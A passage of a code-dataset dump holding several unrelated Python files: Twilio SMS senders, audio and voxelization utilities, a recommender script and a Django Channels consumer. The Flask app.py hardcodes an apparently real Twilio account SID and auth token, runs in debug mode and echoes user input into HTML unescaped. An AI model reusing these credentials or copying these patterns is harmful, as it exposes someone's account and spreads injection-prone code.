self.account_sid = key.api_keys['TWILIO_SID']\n self.auth_token = 
key.api_keys['TWILIO_TOKEN']\n        self.client = Client(self.account_sid, self.auth_token)\n        self.body = None\n\n    def send_sms(self):\n        message = self.client.api.messages.create(\n            to=\"+18609667758\",\n            body=self.body,\n            from_=\"+18603563068\"\n        )\n\n\n","sub_path":"modules/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"160536227","text":"import pyaudio\nimport time\nimport numpy as np\n\nWIDTH = 2\nCHANNELS = 1\nRATE = 44100\n\ndef main():\n    pa = pyaudio.PyAudio()\n\n    # fd = open('data/test.dat', 'wb')\n\n    def callback(in_data, frame_count, time_info, status):\n        # print(np.frombuffer(in_data, dtype=np.int16))\n        # fd.write(in_data)\n        # print(frame_count)\n        return (in_data, pyaudio.paContinue)\n\n    format = pa.get_format_from_width(WIDTH)\n\n    stream = pa.open(\n        format = format,\n        channels = CHANNELS,\n        rate = RATE,\n        input = True,\n        output = True,\n        stream_callback = callback,\n        frames_per_buffer=256,\n    )\n\n    stream.start_stream()\n\n    while stream.is_active():\n        time.sleep(0.0025)\n\n    stream.stop_stream()\n    stream.close()\n\n    pa.terminate()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"examples/002_wire.py","file_name":"002_wire.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"149724139","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep  4 23:18:40 2018\n\n@author: braulinho\n\"\"\"\nfrom pymongo import MongoClient\n\ndef simsMatrix(correo):\n    try:\n        client = MongoClient('localhost',27017)\n        #database reference \n        db = client.Itinerario\n        \n        # references\n        historial = db.history\n        \n        # fetch the data\n        mongo = historial.find({},projection={'_id':0.0, 'lugar':1.0, 'visitantes':1.0})\n        lugares=[]\n        usuarios=[]\n        for registro in mongo:\n            lugares.append(str(registro['lugar']))\n            usuarios.append(registro['visitantes'])\n        \n        # data \n        simsMatrix={}\n        for i, lui in enumerate(lugares):\n            jaccard=[]\n            for j, luj in enumerate(lugares):\n                jaccard.append(len(set(usuarios[i]).intersection(usuarios[j]))/\n                               len(set(usuarios[i]).union(usuarios[j])))\n            simsMatrix[lui]=jaccard \n        \n        # get the places this user has visited\n        index=[]\n        for i in enumerate(usuarios):\n            if correo in i[1]:\n                index.append([lugares[i[0]],simsMatrix[lugares[i[0]]],i[0]])\n\n        # recommend anything above 80% similarity, if any, based on what they visited\n        result=[]\n        for vis in index:\n            #obj={}\n            #l=[]\n            for i,el in enumerate(vis[1]):\n                if (i != vis[2]) and (el > 0.79):\n                    if lugares[i] not in result:\n                        result.append(lugares[i])\n            #obj[vis[0]]=l\n            #result.append(obj)\n        print (result)\n    except:\n        print([])\n    finally:\n        client.close()\n    \nif __name__ == \"__main__\":\n    import sys\n    simsMatrix(sys.argv[1])","sub_path":"scripts/RecSys.py","file_name":"RecSys.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"483924238","text":"import os\nfrom twilio.rest import Client\nfrom flask import Flask, redirect, url_for, render_template, request\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n    return render_template(\"index.html\", content=\"Testing\")\n    \n@app.route(\"/sms\", methods=[\"POST\", \"GET\"])\ndef sms():\n    if request.method == \"POST\":\n\n        tonum = request.form[\"smsnum\"]\n        tobody = str(request.form[\"smsbody\"])\n        account_sid = 'AC46648a764504d96ef5f6ff9d7c493117'\n        auth_token = 
'11eb94b229fa1348c2ce5fe730254d4c'\n        client = Client(account_sid, auth_token)\n\n        message = client.messages \\\n            .create(\n                body=tobody,\n                from_='+19035002648',\n                to=tonum\n            )\n\n        print(message.sid)\n        print(message.body)\n        return(\"sms sent\")\n    else:\n        return render_template(\"sms.html\")\n\n@app.route(\"/<usr>\")\ndef user(usr):\n    return f\"<h1>{usr}</h1>\"\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"86388367","text":"\"\"\"\nvoxel.py\n-----------\n\nConvert meshes to a simple voxel data structure and back again.\n\"\"\"\nimport numpy as np\n\nfrom . import util\nfrom . import remesh\nfrom . import caching\nfrom . import grouping\n\nfrom .constants import log, log_time\n\n\nclass VoxelBase(object):\n\n def __init__(self, *args, **kwargs):\n self._data = caching.DataStore()\n self._cache = caching.Cache(id_function=self._data.crc)\n\n @caching.cache_decorator\n def marching_cubes(self):\n \"\"\"\n A marching cubes Trimesh representation of the voxels.\n\n No effort was made to clean or smooth the result in any way;\n it is merely the result of applying the scikit-image\n measure.marching_cubes function to self.matrix.\n\n Returns\n ---------\n meshed: Trimesh object representing the current voxel\n object, as returned by marching cubes algorithm.\n \"\"\"\n meshed = matrix_to_marching_cubes(matrix=self.matrix,\n pitch=self.pitch,\n origin=self.origin)\n return meshed\n\n @property\n def pitch(self):\n # stored as TrackedArray with a single element\n return self._data['pitch'][0]\n\n @pitch.setter\n def pitch(self, value):\n self._data['pitch'] = value\n\n @property\n def shape(self):\n \"\"\"\n The shape of the matrix for the current voxel object.\n\n Returns\n ---------\n shape: (3,) int, what is the shape of the 3D matrix\n for these voxels\n \"\"\"\n return self.matrix.shape\n\n @caching.cache_decorator\n def filled_count(self):\n \"\"\"\n Return the number of voxels that are occupied.\n\n Returns\n --------\n filled: int, number of voxels that are occupied\n \"\"\"\n return int(self.matrix.sum())\n\n @caching.cache_decorator\n def volume(self):\n \"\"\"\n What is the volume of the filled cells in the current voxel object.\n\n Returns\n ---------\n volume: float, volume of filled cells\n \"\"\"\n volume = self.filled_count * (self.pitch**3)\n return volume\n\n @caching.cache_decorator\n def points(self):\n \"\"\"\n The center of each filled cell as a list of points.\n\n Returns\n ----------\n points: (self.filled, 3) float, list of points\n \"\"\"\n points = matrix_to_points(matrix=self.matrix,\n pitch=self.pitch,\n origin=self.origin)\n return points\n\n def point_to_index(self, point):\n \"\"\"\n Convert a point to an index in the matrix array.\n\n Parameters\n ----------\n point: (3,) float, point in space\n\n Returns\n ---------\n index: (3,) int tuple, index in self.matrix\n \"\"\"\n indices = points_to_indices(points=[point],\n pitch=self.pitch,\n origin=self.origin)\n index = tuple(indices[0])\n return index\n\n def is_filled(self, point):\n \"\"\"\n Query a point to see if the voxel cell it lies in is filled or not.\n\n Parameters\n ----------\n point: (3,) float, point in space\n\n Returns\n ---------\n is_filled: bool, is cell occupied or not\n \"\"\"\n index = self.point_to_index(point)\n in_range = (np.array(index) < np.array(self.shape)).all()\n if in_range:\n is_filled = self.matrix[index]\n else:\n is_filled = False\n return is_filled\n\n\nclass Voxel(VoxelBase):\n\n def __init__(self, matrix, pitch, origin):\n super(Voxel, self).__init__()\n\n self._data['matrix'] = matrix\n self._data['pitch'] = pitch\n self._data['origin'] = origin\n\n @property\n def origin(self):\n return self._data['origin']\n\n @property\n def matrix(self):\n return self._data['matrix']\n\n def as_boxes(self):\n \"\"\"\n A rough Trimesh representation of the voxels with a box\n for each filled voxel.\n\n Returns\n ---------\n mesh: Trimesh object made up of one box per filled cell.\n 
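Illustrative sketch (hypothetical values; numpy is imported above as np): Voxel(np.ones((2, 2, 2), dtype=bool), pitch=1.0, origin=[0, 0, 0]).as_boxes() returns a mesh of eight unit boxes.\n        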
\"\"\"\n        centers = matrix_to_points(\n            matrix=self._data['matrix'],\n            pitch=self._data['pitch'],\n            origin=self._data['origin'],\n        )\n        mesh = multibox(centers=centers, pitch=self.pitch)\n        return mesh\n\n    def show(self, *args, **kwargs):\n        \"\"\"\n        Convert the current set of voxels into a trimesh for visualization\n        and show that via its built-in preview method.\n        \"\"\"\n        return self.as_boxes().show(*args, **kwargs)\n\n\nclass VoxelMesh(VoxelBase):\n\n    def __init__(self,\n                 mesh,\n                 pitch,\n                 max_iter=10,\n                 size_max=None,\n                 method='subdivide'):\n        \"\"\"\n        A voxel representation of a mesh that will track changes to\n        the mesh.\n\n        At the moment the voxels are not filled in and only represent\n        the surface.\n\n        Parameters\n        ----------\n        mesh: Trimesh object\n        pitch: float, how long should each edge of the voxel be\n        size_max: float, maximum size (in mb) of a data structure that\n                  may be created before raising an exception\n        \"\"\"\n        super(VoxelMesh, self).__init__()\n\n        self._method = method\n        self._data['mesh'] = mesh\n        self._data['pitch'] = pitch\n        self._data['max_iter'] = max_iter\n\n    @caching.cache_decorator\n    def matrix_surface(self):\n        \"\"\"\n        The voxels on the surface of the mesh as a 3D matrix.\n\n        Returns\n        ---------\n        matrix: self.shape np.bool, if a cell is True it is occupied\n        \"\"\"\n        matrix = sparse_to_matrix(self.sparse_surface)\n        return matrix\n\n    @caching.cache_decorator\n    def matrix_solid(self):\n        \"\"\"\n        The voxels in a mesh as a 3D matrix.\n\n        Returns\n        ---------\n        matrix: self.shape np.bool, if a cell is True it is occupied\n        \"\"\"\n        matrix = sparse_to_matrix(self.sparse_solid)\n        return matrix\n\n    @property\n    def matrix(self):\n        \"\"\"\n        A matrix representation of the surface voxels.\n\n        In the future this is planned to return a filled voxel matrix\n        if the source mesh is watertight, and a surface voxelization\n        otherwise.\n\n        Returns\n        ---------\n        matrix: self.shape np.bool, cell occupancy\n        \"\"\"\n        if self._data['mesh'].is_watertight:\n            return self.matrix_solid\n        return self.matrix_surface\n\n    @property\n    def origin(self):\n        \"\"\"\n        The origin of the voxel array.\n\n        Returns\n        ------------\n        origin: (3,) float, point in space\n        \"\"\"\n        populate = self.sparse_surface\n        return self._cache['origin']\n\n    @caching.cache_decorator\n    def sparse_surface(self):\n        \"\"\"\n        Filled cells on the surface of the mesh.\n\n        Returns\n        ----------------\n        voxels: (n, 3) int, filled cells on mesh surface\n        \"\"\"\n        if self._method == 'ray':\n            func = voxelize_ray\n        elif self._method == 'subdivide':\n            func = voxelize_subdivide\n        else:\n            raise ValueError('voxelization method incorrect')\n\n        voxels, origin = func(\n            mesh=self._data['mesh'],\n            pitch=self._data['pitch'],\n            max_iter=self._data['max_iter'][0])\n        self._cache['origin'] = origin\n\n        return voxels\n\n    @caching.cache_decorator\n    def sparse_solid(self):\n        \"\"\"\n        Filled cells inside and on the surface of the mesh\n\n        Returns\n        ----------------\n        filled: (n, 3) int, filled cells in or on mesh.\n        \"\"\"\n        filled = fill_voxelization(self.sparse_surface)\n        return filled + 0.5\n\n    def as_boxes(self, solid=False):\n        \"\"\"\n        A rough Trimesh representation of the voxels with a box\n        for each filled voxel.\n\n        Parameters\n        -----------\n        solid: bool, if True return boxes for sparse_solid\n\n        Returns\n        ---------\n        mesh: Trimesh object made up of one box per filled cell.\n        \"\"\"\n        if solid:\n            filled = self.sparse_solid\n        else:\n            filled = self.sparse_surface\n        # center points of voxels\n        centers = indices_to_points(indices=filled,\n                                    
pitch=self.pitch,\n origin=self.origin)\n mesh = multibox(centers=centers, pitch=self.pitch)\n return mesh\n\n def show(self, solid=False):\n \"\"\"\n Convert the current set of voxels into a trimesh for visualization\n and show that via its built-in preview method.\n \"\"\"\n self.as_boxes(solid=solid).show()\n\n\n@log_time\ndef voxelize_subdivide(mesh,\n pitch,\n max_iter=10,\n edge_factor=2.0):\n \"\"\"\n Voxelize a surface by subdividing a mesh until every edge is\n shorter than: (pitch / edge_factor)\n\n Parameters\n -----------\n mesh: Trimesh object\n pitch: float, side length of a single voxel cube\n max_iter: int, cap maximum subdivisions or None for no limit.\n edge_factor: float,\n\n Returns\n -----------\n voxels_sparse: (n,3) int, (m,n,p) indexes of filled cells\n origin_position: (3,) float, position of the voxel\n grid origin in space\n \"\"\"\n max_edge = pitch / edge_factor\n\n if max_iter is None:\n longest_edge = np.linalg.norm(mesh.vertices[mesh.edges[:, 0]] -\n mesh.vertices[mesh.edges[:, 1]],\n axis=1).max()\n max_iter = max(int(np.ceil(np.log2(longest_edge / max_edge))), 0)\n\n # get the same mesh subdivided so every edge is shorter\n # than a factor of our pitch\n v, f = remesh.subdivide_to_size(mesh.vertices,\n mesh.faces,\n max_edge=max_edge,\n max_iter=max_iter)\n\n # convert the vertices to their voxel grid position\n hit = v / pitch\n\n # Provided edge_factor > 1 and max_iter is large enough, this is\n # sufficient to preserve 6-connectivity at the level of voxels.\n hit = np.round(hit).astype(int)\n\n # remove duplicates\n unique, inverse = grouping.unique_rows(hit)\n\n # get the voxel centers in model space\n occupied_index = hit[unique]\n\n origin_index = occupied_index.min(axis=0)\n origin_position = origin_index * pitch\n\n voxels_sparse = (occupied_index - origin_index)\n\n return voxels_sparse, origin_position\n\n\ndef local_voxelize(mesh, point, pitch, radius, fill=True, **kwargs):\n \"\"\"\n Voxelize a mesh in the region of a cube around a point. When fill=True,\n uses proximity.contains to fill the resulting voxels so may be meaningless\n for non-watertight meshes. 
Useful to reduce memory cost for small values of\n pitch as opposed to global voxelization.\n\n Parameters\n -----------\n mesh : trimesh.Trimesh\n Source geometry\n point : (3, ) float\n Point in space to voxelize around\n pitch : float\n Side length of a single voxel cube\n radius : int\n Number of voxel cubes to return in each direction.\n kwargs : parameters to pass to voxelize_subdivide\n\n Returns\n -----------\n voxels : (m, m, m) bool\n Array of local voxels where m=2*radius+1\n origin_position : (3,) float\n Position of the voxel grid origin in space\n \"\"\"\n from scipy import ndimage\n\n # make sure point is correct type/shape\n point = np.asanyarray(point, dtype=np.float64).reshape(3)\n # this is a gotcha- radius sounds a lot like it should be in\n # float model space, not int voxel space so check\n if not isinstance(radius, int):\n raise ValueError('radius needs to be an integer number of cubes!')\n\n # Bounds of region\n bounds = np.concatenate((point - (radius + 0.5) * pitch,\n point + (radius + 0.5) * pitch))\n\n # faces that intersect axis aligned bounding box\n faces = list(mesh.triangles_tree.intersection(bounds))\n\n # didn't hit anything so exit\n if len(faces) == 0:\n return np.array([], dtype=np.bool), np.zeros(3)\n\n local = mesh.submesh([[f] for f in faces], append=True)\n\n # Translate mesh so point is at 0,0,0\n local.apply_translation(-point)\n\n sparse, origin = voxelize_subdivide(local, pitch, **kwargs)\n matrix = sparse_to_matrix(sparse)\n\n # Find voxel index for point\n center = np.round(-origin / pitch).astype(np.int64)\n\n # pad matrix if necessary\n prepad = np.maximum(radius - center, 0)\n postpad = np.maximum(center + radius + 1 - matrix.shape, 0)\n\n matrix = np.pad(matrix, np.stack((prepad, postpad), axis=-1),\n mode='constant')\n center += prepad\n\n # Extract voxels within the bounding box\n voxels = matrix[center[0] - radius:center[0] + radius + 1,\n center[1] - radius:center[1] + radius + 1,\n center[2] - radius:center[2] + radius + 1]\n local_origin = point - radius * pitch # origin of local voxels\n\n # Fill internal regions\n if fill:\n regions, n = ndimage.measurements.label(~voxels)\n distance = ndimage.morphology.distance_transform_cdt(~voxels)\n representatives = [np.unravel_index((distance * (regions == i)).argmax(),\n distance.shape) for i in range(1, n + 1)]\n contains = mesh.contains(\n np.asarray(representatives) *\n pitch +\n local_origin)\n\n where = np.where(contains)[0] + 1\n # use in1d vs isin for older numpy versions\n internal = np.in1d(regions.flatten(), where).reshape(regions.shape)\n\n voxels = np.logical_or(voxels, internal)\n\n return voxels, local_origin\n\n\n@log_time\ndef voxelize_ray(mesh,\n pitch,\n per_cell=[2, 2],\n **kwargs):\n \"\"\"\n Voxelize a mesh using ray queries.\n\n Parameters\n -------------\n mesh : Trimesh object\n Mesh to be voxelized\n pitch : float\n Length of voxel cube\n per_cell : (2,) int\n How many ray queries to make per cell\n\n Returns\n -------------\n voxels : (n, 3) int\n Voxel positions\n origin : (3, ) int\n Origin of voxels\n \"\"\"\n # how many rays per cell\n per_cell = np.array(per_cell).astype(np.int).reshape(2)\n # edge length of cube voxels\n pitch = float(pitch)\n\n # create the ray origins in a grid\n bounds = mesh.bounds[:, :2].copy()\n # offset start so we get the requested number per cell\n bounds[0] += pitch / (1.0 + per_cell)\n # offset end so arange doesn't short us\n bounds[1] += pitch\n # on X we are doing multiple rays per voxel step\n step = pitch / per_cell\n # 2D 
grid\n ray_ori = util.grid_arange(bounds, step=step)\n # a Z position below the mesh\n z = np.ones(len(ray_ori)) * (mesh.bounds[0][2] - pitch)\n ray_ori = np.column_stack((ray_ori, z))\n # all rays are along positive Z\n ray_dir = np.ones_like(ray_ori) * [0, 0, 1]\n\n # if you have pyembree this should be decently fast\n hits = mesh.ray.intersects_location(ray_ori, ray_dir)[0]\n\n # just convert hit locations to integer positions\n voxels = np.round(hits / pitch).astype(np.int64)\n\n # offset voxels by min, so matrix isn't huge\n origin = voxels.min(axis=0)\n voxels -= origin\n\n return voxels, origin\n\n\ndef fill_voxelization(occupied):\n \"\"\"\n Given a sparse surface voxelization, fill in between columns.\n\n Parameters\n --------------\n occupied: (n, 3) int, location of filled cells\n\n Returns\n --------------\n filled: (m, 3) int, location of filled cells\n \"\"\"\n # validate inputs\n occupied = np.asanyarray(occupied, dtype=np.int64)\n if not util.is_shape(occupied, (-1, 3)):\n raise ValueError('incorrect shape')\n\n # create grid and mark inner voxels\n max_value = occupied.max() + 3\n\n grid = np.zeros((max_value,\n max_value,\n max_value),\n dtype=np.int64)\n voxels_sparse = np.add(occupied, 1)\n\n grid.__setitem__(tuple(voxels_sparse.T), 1)\n\n for i in range(max_value):\n check_dir2 = False\n for j in range(0, max_value - 1):\n idx = []\n # find transitions first\n # transition positions are from 0 to 1 and from 1 to 0\n eq = np.equal(grid[i, j, :-1], grid[i, j, 1:])\n idx = np.where(np.logical_not(eq))[0] + 1\n c = len(idx)\n check_dir2 = (c % 4) > 0 and c > 4\n if c < 4:\n continue\n for s in range(0, c - c % 4, 4):\n grid[i, j, idx[s]:idx[s + 3]] = 1\n if not check_dir2:\n continue\n\n # check another direction for robustness\n for k in range(0, max_value - 1):\n idx = []\n # find transitions first\n eq = np.equal(grid[i, :-1, k], grid[i, 1:, k])\n idx = np.where(np.logical_not(eq))[0] + 1\n c = len(idx)\n if c < 4:\n continue\n for s in range(0, c - c % 4, 4):\n grid[i, idx[s]:idx[s + 3], k] = 1\n\n # generate new voxels\n idx = np.where(grid == 1)\n filled = np.array([[idx[0][i] - 1,\n idx[1][i] - 1,\n idx[2][i] - 1]\n for i in range(len(idx[0]))])\n\n return filled\n\n\ndef points_to_indices(points, pitch, origin):\n \"\"\"\n Convert center points of an (n,m,p) matrix into its indices.\n\n Parameters\n ----------\n points: (q, 3) float, center points of voxel matrix (n,m,p)\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n indices: (q, 3) int, list of indices\n \"\"\"\n points = np.asanyarray(points, dtype=np.float64)\n origin = np.asanyarray(origin, dtype=np.float64)\n pitch = float(pitch)\n\n if points.shape != (points.shape[0], 3):\n raise ValueError('shape of points must be (q, 3)')\n\n if origin.shape != (3,):\n raise ValueError('shape of origin must be (3,)')\n\n indices = np.round((points - origin) / pitch + 0.5).astype(int)\n return indices\n\n\ndef indices_to_points(indices, pitch, origin):\n \"\"\"\n Convert indices of an (n,m,p) matrix into a set of voxel center points.\n\n Parameters\n ----------\n indices: (q, 3) int, index of voxel matrix (n,m,p)\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n points: (q, 3) float, list of points\n \"\"\"\n indices = np.asanyarray(indices, dtype=np.float64)\n origin = np.asanyarray(origin, dtype=np.float64)\n pitch = 
float(pitch)\n\n if indices.shape != (indices.shape[0], 3):\n raise ValueError('shape of indices must be (q, 3)')\n\n if origin.shape != (3,):\n raise ValueError('shape of origin must be (3,)')\n\n points = (indices - 0.5) * pitch + origin\n return points\n\n\ndef matrix_to_points(matrix, pitch, origin):\n \"\"\"\n Convert an (n,m,p) matrix into a set of points for each voxel center.\n\n Parameters\n -----------\n matrix: (n,m,p) bool, voxel matrix\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n points: (q, 3) list of points\n \"\"\"\n indices = np.column_stack(np.nonzero(matrix))\n points = indices_to_points(indices=indices, pitch=pitch, origin=origin)\n return points\n\n\ndef matrix_to_marching_cubes(matrix, pitch, origin):\n \"\"\"\n Convert an (n,m,p) matrix into a mesh, using marching_cubes.\n\n Parameters\n -----------\n matrix: (n,m,p) bool, voxel matrix\n pitch: float, what pitch was the voxel matrix computed with\n origin: (3,) float, what is the origin of the voxel matrix\n\n Returns\n ----------\n mesh: Trimesh object, generated by meshing voxels using\n the marching cubes algorithm in skimage\n \"\"\"\n from skimage import measure\n from .base import Trimesh\n\n matrix = np.asanyarray(matrix, dtype=np.bool)\n\n rev_matrix = np.logical_not(matrix) # Takes set about 0.\n # Add in padding so marching cubes can function properly with\n # voxels on edge of AABB\n pad_width = 1\n rev_matrix = np.pad(rev_matrix,\n pad_width=(pad_width),\n mode='constant',\n constant_values=(1))\n\n # pick between old and new API\n if hasattr(measure, 'marching_cubes_lewiner'):\n func = measure.marching_cubes_lewiner\n else:\n func = measure.marching_cubes\n\n # Run marching cubes.\n meshed = func(volume=rev_matrix,\n level=.5, # it is a boolean voxel grid\n spacing=(pitch,\n pitch,\n pitch))\n\n # allow results from either marching cubes function in skimage\n # binaries available for python 3.3 and 3.4 appear to use the classic\n # method\n if len(meshed) == 2:\n log.warning('using old marching cubes, may not be watertight!')\n vertices, faces = meshed\n normals = None\n elif len(meshed) == 4:\n vertices, faces, normals, vals = meshed\n\n # Return to the origin, add in the pad_width\n vertices = np.subtract(np.add(vertices, origin), pad_width * pitch)\n # create the mesh\n mesh = Trimesh(vertices=vertices,\n faces=faces,\n vertex_normals=normals)\n return mesh\n\n\ndef sparse_to_matrix(sparse):\n \"\"\"\n Take a sparse (n,3) list of integer indexes of filled cells,\n turn it into a dense (m,o,p) matrix.\n\n Parameters\n -----------\n sparse: (n,3) int, index of filled cells\n\n Returns\n ------------\n dense: (m,o,p) bool, matrix of filled cells\n \"\"\"\n\n sparse = np.asanyarray(sparse, dtype=np.int)\n if not util.is_shape(sparse, (-1, 3)):\n raise ValueError('sparse must be (n,3)!')\n\n shape = sparse.max(axis=0) + 1\n matrix = np.zeros(np.product(shape), dtype=np.bool)\n multiplier = np.array([np.product(shape[1:]), shape[2], 1])\n\n index = (sparse * multiplier).sum(axis=1)\n matrix[index] = True\n\n dense = matrix.reshape(shape)\n return dense\n\n\ndef multibox(centers, pitch):\n \"\"\"\n Return a Trimesh object with a box at every center.\n\n Doesn't do anything nice or fancy.\n\n Parameters\n -----------\n centers: (n,3) float, center of boxes that are occupied\n pitch: float, the edge length of a voxel\n\n Returns\n ---------\n rough: Trimesh object representing inputs\n \"\"\"\n from . 
import primitives\n from .base import Trimesh\n\n b = primitives.Box(extents=[pitch, pitch, pitch])\n\n v = np.tile(centers, (1, len(b.vertices))).reshape((-1, 3))\n v += np.tile(b.vertices, (len(centers), 1))\n\n f = np.tile(b.faces, (len(centers), 1))\n f += np.tile(np.arange(len(centers)) * len(b.vertices),\n (len(b.faces), 1)).T.reshape((-1, 1))\n\n rough = Trimesh(vertices=v, faces=f)\n\n return rough\n\n\ndef boolean_sparse(a, b, operation=np.logical_and):\n \"\"\"\n Find common rows between two arrays very quickly\n using 3D boolean sparse matrices.\n\n Parameters\n -----------\n a: (n, d) int, coordinates in space\n b: (m, d) int, coordinates in space\n operation: numpy operation function, ie:\n np.logical_and\n np.logical_or\n\n Returns\n -----------\n coords: (q, d) int, coordinates in space\n \"\"\"\n # 3D sparse arrays, using wrapped scipy.sparse\n # pip install sparse\n import sparse\n\n # find the bounding box of both arrays\n extrema = np.array([a.min(axis=0),\n a.max(axis=0),\n b.min(axis=0),\n b.max(axis=0)])\n origin = extrema.min(axis=0) - 1\n size = tuple(extrema.ptp(axis=0) + 2)\n\n # put nearby voxel arrays into same shape sparse array\n sp_a = sparse.COO((a - origin).T,\n data=np.ones(len(a), dtype=np.bool),\n shape=size)\n sp_b = sparse.COO((b - origin).T,\n data=np.ones(len(b), dtype=np.bool),\n shape=size)\n\n # apply the logical operation\n # get a sparse matrix out\n applied = operation(sp_a, sp_b)\n # reconstruct the original coordinates\n coords = np.column_stack(applied.coords) + origin\n\n return coords\n","sub_path":"trimesh/voxel.py","file_name":"voxel.py","file_ext":"py","file_size_in_byte":24913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"442396467","text":"# Copyright 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom enums.error_code import JRPCErrorCodes\n\nclass UnknownException(Exception):\n \"\"\"Any unknown error and status is returned in \n the following generic JSON RPC error format\"\"\"\n\n def __init__(self, message, data):\n\n self.error = {\n \"jsonrpc\": \"2.0\", # as per JSON RPC spec\n \"id\": 0, # the same as in input\n \"error\": { # as per JSON RPC spec\n \"code\": JRPCErrorCodes.UNKNOWN_ERROR,\n \"message\": message,\n \"data\": data\n } \n }\n","sub_path":"src/internal/exceptions/unknown_error.py","file_name":"unknown_error.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"438108839","text":"# coding: utf8\nfrom phxweb.customer import DefConsumer\nfrom phxweb import settings\nfrom saltstack.saltapi import SaltAPI\nfrom monitor.models import project_t, minion_t, minion_ip_t, svn_master_t\nfrom upgrade.models import svn_customer_t\nfrom saltstack.command import Command\nfrom accounts.limit import LimitAccess\nfrom accounts.views import getIp, getProjects\nfrom accounts.models import user_project_authority_t\nfrom detect.telegram import 
sendTelegram\n\nimport json, logging, time, urlparse, requests\n\nlogger = logging.getLogger('django')\n\n# telegram parameters\nmessage = settings.message_TEST\n\nclass ApacheConfig(DefConsumer):\n # Set to True to automatically port users from HTTP cookies\n # (you don't need channel_session_user, this implies it)\n http_user = True\n channel_session_user = True\n\n # Set to True if you want it, else leave it out\n strict_ordering = False\n\n def receive(self, text=None, bytes=None, **kwargs):\n \"\"\"\n Called when a message is received with either text or bytes\n filled out.\n \"\"\"\n #self.close()\n\n self.clientip = '127.0.0.1'\n self.username = self.message.user.username\n try:\n self.role = self.message.user.userprofile.role\n except:\n self.role = 'none'\n\n data = json.loads(self.message['text'])\n step = 0\n\n ### step one ###\n info = {}\n info['step'] = 'one'\n self.message.reply_channel.send({'text': json.dumps(info)})\n\n ### final step ###\n info = {}\n info['step'] = 'final'\n info['results'] = {}\n svn_customer_dict = {}\n\n count = 1\n for customer_id in data['customer']:\n customer_name = 'none'\n for value in data['item']['svn_customer']['in']:\n if int(customer_id) == value['id']:\n customer_name = value['name']\n break\n try:\n svn_customer = svn_customer_t.objects.get(id=customer_id)\n except Exception as e:\n message['text'] = \"The selected customer [%s] record does not exist, please contact the administrator!\" %customer_name + '\\nException: ' + str(e)\n logger.error(message['text'])\n sendTelegram(message).send()\n info['results'][data['minion_id']+'-'+str(count)] = message['text']\n self.message.reply_channel.send({'text': json.dumps(info)})\n self.close()\n return False\n count += 1\n else:\n svn_customer_dict[svn_customer.name] = {\n 'master_ip': [ ip.strip() for ip in svn_customer.master_ip.split('\\r\\n') if ip.strip() != \"\" ],\n 'ip': [ ip.strip() for ip in svn_customer.ip.split('\\r\\n') if ip.strip() != \"\" ],\n 'port': svn_customer.port,\n 'ismaster': True if svn_customer.ismaster == 1 else False, \n 'isrsynccode': True if svn_customer.isrsynccode == 1 else False,\n 'cmd': [cmd.strip() for cmd in svn_customer.cmd.split('\\r\\n') if cmd.strip() != \"\" ],\n 'gray_domain': svn_customer.gray_domain,\n 'online_domain': svn_customer.online_domain,\n 'src_d': svn_customer.src_d,\n 'dst_d': svn_customer.dst_d,\n }\n\n try:\n svn_master = svn_master_t.objects.get(id=data['svn_master_id'])\n api = svn_master.api.strip('/') + '/apache_config'\n logger.info('posting: %s' %api)\n #logger.info('posting: %s' %svn_customer_dict)\n ret = requests.post(api, data=json.dumps(svn_customer_dict))\n except Exception as e:\n message['text'] = 'Exception: ' + str(e)\n logger.error(message['text'])\n sendTelegram(message).send()\n info['results'][data['minion_id']] = message['text']\n else:\n info['results'][data['minion_id']] = ret.content\n\n self.message.reply_channel.send({'text': json.dumps(info)})\n self.close()","sub_path":"phxweb/upgrade/deploy/apache_config_customer.py","file_name":"apache_config_customer.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"20375858","text":"# Author: River Mao\n# Purpose: compute the overlap ratio of two patches cropped from the same image\nimport cv2\nimport numpy as np\n\ndef cal_overlap(ROI1P, ROI2P, grayImg, if_show = False):\n '''\n Compute the overlap ratio of two regions on the same image\n input:\n ROI1P: coordinates of region one, [y, x, height, width]; by convention the ROI in the first position is the positive-sample region\n ROI2P: coordinates of region two, [y, x, height, width]; set to the region under test, assumed to be the same size as ROI1P\n grayImg: grayscale image\n if_show: whether to display the image masks\n\n output:\n 
